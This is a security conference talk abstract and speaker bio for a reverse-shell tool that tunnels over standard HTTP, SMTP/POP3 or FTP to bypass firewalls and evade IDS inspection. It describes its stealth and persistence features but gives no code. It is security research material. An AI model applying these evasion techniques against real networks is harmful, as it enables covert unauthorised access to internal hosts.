Presentation Title: Next Generation Reverse Shell (NGRS)
Presentation Abstract:

The purpose of the Next Generation Reverse Shell [NGRS] is to revolutionize the concept of Reverse Shell to a new mature level. The current existing implementations and tools of Reverse Shell lack things like reliability, stealthiness, flexibility, filtering evasion, or maintainability. On the other hand, NGRS introduces a new original implementation that takes into consideration issues like IDS evasion, flexibility of changing the protocol carrier (e.g. HTTP, SMTP/POP3, or FTP), maintaining the open session, and a reliable way of ensuring the continuity of the established session. When used correctly, NGRS enables both security professionals (e.g. penetration testers and consultants) and hackers alike to have full shell access to internal hosts of corporate and organizations even though the corporate firewall is blocking all incoming (inbound) connections and allowing single outgoing (outbound) connection to port 80 (HTTP), 25(SMTP)/110(POP3), or 21(FTP). NGRS also works perfectly if there is an IDS or application inspection device that allows only standard HTTP, standard SMTP/POP3, or standard FTP. Meaning, the traffic generated by the NGRS application fully complies with the standard implementation of HTTP, SMTP/POP3 or FTP.

Looking into the existing implementations of Reverse Shell, one can find the following weaknesses; first, they implement their own text-based protocol and in many cases, random text is just sent over TCP without having proper organized application-level protocol. Even if the port number used by the Reverse Shell is open on the firewall, an IDS or packet inspector will stop such traffic because it is non-standard. Second, once the reverse shell is established to a particular port, it cannot be changed dynamically by the user controlling the session. If the user wishes to change the port, he has to manually establish the new connection by running a new instance of the reverse shell application on the remote machine with the new intended port. Third, the reverse shell application is not smart enough to maintain a reliable established session for a long period of time or re-establish the session automatically in case sometime goes wrong in the middle of a connection.

So, the very aim of NGRS is to introduce an enhanced technique and an advanced implementation of Reverse Shell; such will bring Reverse Shell technique into an appropriate level in the modern era of network security. The Next Generation Reverse Shell [NGRS] addresses the aforementioned weaknesses as follows:

A. Reliability
B. Stealthiness
C. IDS and Application Inspection Evasion
D. Flexibility
E. Maintainability

About AR

AR is both an independent researcher and an engineer in the field of Network Security. He works for Consolidated Contractors International Company [CCIC] that is based in Greece. His responsibility ranges from design, architecture and deployment of large-scale security solutions to vulnerability assessment and penetration testing.

AR’s main interest is in stretching existing and researching new network attack and defense methodologies and providing working tools and PoCs demonstrating his research. He has spoken before at Ruxcon, an Australian hacker convention. He is also a Certified Ethical Hacker (CEH) and has a university degree in Computer Engineering. His research can be found at (http://www.securebits.org)